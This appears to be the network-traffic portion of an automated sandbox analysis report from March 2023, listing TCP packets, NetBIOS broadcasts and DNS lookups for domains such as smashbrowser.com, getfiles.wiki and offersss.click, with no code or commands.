                                                                                                                  Mar 21, 2023 13:20:50.630953074 CET44349215141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.642205000 CET49215443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:20:50.642241001 CET44349215141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.644423008 CET44349215141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.644512892 CET49215443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:20:50.647228956 CET49215443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:20:50.647258997 CET44349215141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.647483110 CET44349215141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.648051977 CET49215443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:20:50.648077965 CET44349215141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.750199080 CET4434921338.128.66.115192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.750318050 CET4434921338.128.66.115192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.750427961 CET49213443192.168.2.2238.128.66.115
                                                                                                                  Mar 21, 2023 13:20:50.752423048 CET49213443192.168.2.2238.128.66.115
                                                                                                                  Mar 21, 2023 13:20:50.752528906 CET4434921338.128.66.115192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.767302036 CET4434921238.128.66.115192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.767498970 CET4434921238.128.66.115192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.767640114 CET49212443192.168.2.2238.128.66.115
                                                                                                                  Mar 21, 2023 13:20:50.769335032 CET49212443192.168.2.2238.128.66.115
                                                                                                                  Mar 21, 2023 13:20:50.769364119 CET4434921238.128.66.115192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.844229937 CET49215443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:20:50.906544924 CET44349215141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.906788111 CET44349215141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.906907082 CET49215443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:20:50.939510107 CET49217443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:50.939588070 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.939666033 CET49217443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:50.941590071 CET49217443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:50.941642046 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.944333076 CET49215443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:20:50.944397926 CET44349215141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.005539894 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.011790037 CET49203443192.168.2.22188.114.97.3
                                                                                                                  Mar 21, 2023 13:20:51.011836052 CET44349203188.114.97.3192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.017244101 CET49217443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:51.017275095 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.018373013 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.033917904 CET49217443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:51.034126043 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.034420013 CET49217443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:51.034445047 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.034472942 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.070017099 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.070116997 CET49217443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:51.070149899 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.070401907 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.070549965 CET49217443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:51.072017908 CET49217443192.168.2.22142.250.203.110
                                                                                                                  Mar 21, 2023 13:20:51.072062016 CET44349217142.250.203.110192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.317944050 CET44349203188.114.97.3192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.318145990 CET44349203188.114.97.3192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.318217039 CET49203443192.168.2.22188.114.97.3
                                                                                                                  Mar 21, 2023 13:20:51.323226929 CET49203443192.168.2.22188.114.97.3
                                                                                                                  Mar 21, 2023 13:20:51.323276043 CET44349203188.114.97.3192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.361871958 CET49222443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.361933947 CET4434922235.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.362020969 CET49222443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.362463951 CET49222443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.362483025 CET4434922235.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.417056084 CET4434922235.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.417671919 CET49222443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.417710066 CET4434922235.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.418998957 CET4434922235.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.419137955 CET49222443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.424688101 CET49222443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.424715042 CET4434922235.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.424880028 CET4434922235.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.424977064 CET49222443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.424995899 CET4434922235.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.563555002 CET4434922235.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.563661098 CET49222443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.564140081 CET49222443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.564167023 CET4434922235.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.565079927 CET49224443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.565123081 CET4434922435.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.565192938 CET49224443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.565752029 CET49224443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.565769911 CET4434922435.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.617139101 CET4434922435.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.617795944 CET49224443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.617832899 CET4434922435.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.618614912 CET4434922435.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.619370937 CET49224443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.619404078 CET4434922435.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.619543076 CET4434922435.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.619595051 CET49224443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.619610071 CET4434922435.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.769520998 CET4434922435.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.769720078 CET49224443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.772152901 CET49224443192.168.2.2235.190.80.1
                                                                                                                  Mar 21, 2023 13:20:51.772190094 CET4434922435.190.80.1192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:53.337124109 CET49192443192.168.2.22188.114.97.3
                                                                                                                  Mar 21, 2023 13:20:53.337347984 CET44349192188.114.97.3192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:53.337431908 CET49192443192.168.2.22188.114.97.3
                                                                                                                  Mar 21, 2023 13:21:34.676786900 CET49269443192.168.2.2254.39.156.32
                                                                                                                  Mar 21, 2023 13:21:34.676858902 CET4434926954.39.156.32192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:34.676944971 CET49269443192.168.2.2254.39.156.32
                                                                                                                  Mar 21, 2023 13:21:34.677541018 CET49269443192.168.2.2254.39.156.32
                                                                                                                  Mar 21, 2023 13:21:34.677571058 CET4434926954.39.156.32192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.010799885 CET4434926954.39.156.32192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.011446953 CET49269443192.168.2.2254.39.156.32
                                                                                                                  Mar 21, 2023 13:21:35.011482954 CET4434926954.39.156.32192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.012000084 CET4434926954.39.156.32192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.012541056 CET49269443192.168.2.2254.39.156.32
                                                                                                                  Mar 21, 2023 13:21:35.012557030 CET4434926954.39.156.32192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.012638092 CET4434926954.39.156.32192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.012902021 CET49269443192.168.2.2254.39.156.32
                                                                                                                  Mar 21, 2023 13:21:35.012916088 CET4434926954.39.156.32192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.121674061 CET4434926954.39.156.32192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.121783972 CET4434926954.39.156.32192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.121871948 CET49269443192.168.2.2254.39.156.32
                                                                                                                  Mar 21, 2023 13:21:35.124289989 CET49269443192.168.2.2254.39.156.32
                                                                                                                  Mar 21, 2023 13:21:35.124342918 CET4434926954.39.156.32192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.130646944 CET49270443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:21:35.130740881 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.130844116 CET49270443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:21:35.131458998 CET49270443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:21:35.131485939 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.174649954 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.175875902 CET49270443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:21:35.175908089 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.176405907 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.184534073 CET49270443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:21:35.184561968 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.184762001 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.185022116 CET49270443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:21:35.185045004 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.439554930 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.439630985 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.439728975 CET49270443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:21:35.439755917 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.439838886 CET44349270141.101.120.11192.168.2.22
                                                                                                                  Mar 21, 2023 13:21:35.439882040 CET49270443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:21:35.442564011 CET49270443192.168.2.22141.101.120.11
                                                                                                                  Mar 21, 2023 13:21:35.442599058 CET44349270141.101.120.11192.168.2.22
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Mar 21, 2023 13:20:36.422619104 CET5166353192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:36.442142963 CET53516638.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:36.460253954 CET5102053192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:36.478131056 CET53510208.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:42.326489925 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:42.327356100 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:42.475146055 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:42.654464006 CET5212953192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:42.655395985 CET5707853192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:42.656925917 CET5227653192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:42.681925058 CET53521298.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:42.683576107 CET53570788.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:42.707256079 CET53522768.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:43.076273918 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:43.077142000 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:43.224226952 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:43.484271049 CET5145453192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:43.506365061 CET53514548.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:43.712038040 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:43.715971947 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:43.717248917 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:43.826438904 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:43.827306032 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:43.974343061 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:44.085860014 CET6397253192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:44.108927965 CET53639728.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:44.461393118 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:44.465389013 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:44.466317892 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:44.738475084 CET4989653192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:44.758316994 CET53498968.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:45.211560965 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:45.215498924 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:45.216453075 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:49.476042032 CET6113853192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:49.479659081 CET5610953192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:49.482430935 CET5022653192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:49.500879049 CET53561098.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:49.501703024 CET53502268.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:49.510060072 CET53611388.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:49.666661024 CET5291353192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET53529138.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.169275999 CET5925253192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:50.192905903 CET53592528.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.553143024 CET6262753192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:50.575396061 CET53626278.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:50.961472034 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:50.964600086 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:50.965611935 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:51.335217953 CET5255453192.168.2.228.8.8.8
                                                                                                                  Mar 21, 2023 13:20:51.360663891 CET53525548.8.8.8192.168.2.22
                                                                                                                  Mar 21, 2023 13:20:51.713797092 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:51.729381084 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:51.730082035 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:52.314461946 CET138138192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:52.478183031 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:52.493736029 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:20:52.496159077 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:21:23.862785101 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:21:24.612128019 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:21:25.371232033 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:21:37.202208042 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:21:37.963083982 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:21:38.727533102 CET137137192.168.2.22192.168.2.255
                                                                                                                  Mar 21, 2023 13:22:21.852103949 CET138138192.168.2.22192.168.2.255
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Mar 21, 2023 13:20:36.422619104 CET192.168.2.228.8.8.80x527fStandard query (0)ocsps.ssl.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:36.460253954 CET192.168.2.228.8.8.80xa2f8Standard query (0)ocsps.ssl.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:42.654464006 CET192.168.2.228.8.8.80xb44cStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:42.655395985 CET192.168.2.228.8.8.80xf68cStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:42.656925917 CET192.168.2.228.8.8.80x3880Standard query (0)smashbrowser.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:43.484271049 CET192.168.2.228.8.8.80x790dStandard query (0)exturl.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:44.085860014 CET192.168.2.228.8.8.80x1dfbStandard query (0)getfiles.wikiA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:44.738475084 CET192.168.2.228.8.8.80x843dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.476042032 CET192.168.2.228.8.8.80x594aStandard query (0)offersss.clickA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.479659081 CET192.168.2.228.8.8.80x89c0Standard query (0)offerszzzz.clickA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.482430935 CET192.168.2.228.8.8.80x7210Standard query (0)s10.histats.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.666661024 CET192.168.2.228.8.8.80x7a99Standard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:50.169275999 CET192.168.2.228.8.8.80x42c3Standard query (0)e.dtscout.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:50.553143024 CET192.168.2.228.8.8.80x5fc2Standard query (0)t.dtscout.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:51.335217953 CET192.168.2.228.8.8.80x7b52Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Mar 21, 2023 13:20:35.924192905 CET8.8.8.8192.168.2.220xbcbaNo error (0)au.c-0001.c-msedge.netc-0001.c-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:35.924192905 CET8.8.8.8192.168.2.220xbcbaNo error (0)c-0001.c-msedge.net13.107.4.50A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:36.442142963 CET8.8.8.8192.168.2.220x527fNo error (0)ocsps.ssl.com100.24.223.135A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:36.442142963 CET8.8.8.8192.168.2.220x527fNo error (0)ocsps.ssl.com34.237.184.165A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:36.442142963 CET8.8.8.8192.168.2.220x527fNo error (0)ocsps.ssl.com52.6.97.148A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:36.478131056 CET8.8.8.8192.168.2.220xa2f8No error (0)ocsps.ssl.com34.237.184.165A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:36.478131056 CET8.8.8.8192.168.2.220xa2f8No error (0)ocsps.ssl.com100.24.223.135A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:36.478131056 CET8.8.8.8192.168.2.220xa2f8No error (0)ocsps.ssl.com52.6.97.148A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:42.681925058 CET8.8.8.8192.168.2.220xb44cNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:42.681925058 CET8.8.8.8192.168.2.220xb44cNo error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:42.683576107 CET8.8.8.8192.168.2.220xf68cNo error (0)accounts.google.com172.217.168.77A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:42.707256079 CET8.8.8.8192.168.2.220x3880No error (0)smashbrowser.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:42.707256079 CET8.8.8.8192.168.2.220x3880No error (0)smashbrowser.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:43.506365061 CET8.8.8.8192.168.2.220x790dNo error (0)exturl.com38.128.66.115A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:44.108927965 CET8.8.8.8192.168.2.220x1dfbNo error (0)getfiles.wiki188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:44.108927965 CET8.8.8.8192.168.2.220x1dfbNo error (0)getfiles.wiki188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:44.758316994 CET8.8.8.8192.168.2.220x843dNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:44.758316994 CET8.8.8.8192.168.2.220x843dNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:44.758316994 CET8.8.8.8192.168.2.220x843dNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:44.758316994 CET8.8.8.8192.168.2.220x843dNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.500879049 CET8.8.8.8192.168.2.220x89c0No error (0)offerszzzz.click38.128.66.115A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.501703024 CET8.8.8.8192.168.2.220x7210No error (0)s10.histats.coms10.histats.com.web.cdn.anycast.meCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.501703024 CET8.8.8.8192.168.2.220x7210No error (0)s10.histats.com.web.cdn.anycast.me46-105-201-240.any.cdn.anycast.meCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.501703024 CET8.8.8.8192.168.2.220x7210No error (0)46-105-201-240.any.cdn.anycast.me46.105.201.240A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.510060072 CET8.8.8.8192.168.2.220x594aNo error (0)offersss.click38.128.66.115A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET8.8.8.8192.168.2.220x7a99No error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET8.8.8.8192.168.2.220x7a99No error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET8.8.8.8192.168.2.220x7a99No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET8.8.8.8192.168.2.220x7a99No error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET8.8.8.8192.168.2.220x7a99No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET8.8.8.8192.168.2.220x7a99No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET8.8.8.8192.168.2.220x7a99No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET8.8.8.8192.168.2.220x7a99No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET8.8.8.8192.168.2.220x7a99No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET8.8.8.8192.168.2.220x7a99No error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:49.684366941 CET8.8.8.8192.168.2.220x7a99No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:50.192905903 CET8.8.8.8192.168.2.220x42c3No error (0)e.dtscout.com141.101.120.11A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:50.192905903 CET8.8.8.8192.168.2.220x42c3No error (0)e.dtscout.com141.101.120.10A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:50.575396061 CET8.8.8.8192.168.2.220x5fc2No error (0)t.dtscout.com141.101.120.11A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:50.575396061 CET8.8.8.8192.168.2.220x5fc2No error (0)t.dtscout.com141.101.120.10A (IP address)IN (0x0001)false
                                                                                                                  Mar 21, 2023 13:20:51.360663891 CET8.8.8.8192.168.2.220x7b52No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                  • clients2.google.com
                                                                                                                  • smashbrowser.com
                                                                                                                  • accounts.google.com
                                                                                                                  • exturl.com
                                                                                                                  • getfiles.wiki
                                                                                                                  • https:
                                                                                                                    • api.ipify.org
                                                                                                                    • s10.histats.com
                                                                                                                    • offerszzzz.click
                                                                                                                    • offersss.click
                                                                                                                    • s4.histats.com
                                                                                                                    • e.dtscout.com
                                                                                                                    • t.dtscout.com
                                                                                                                  • a.nel.cloudflare.com
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.2.2249187142.250.203.110443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
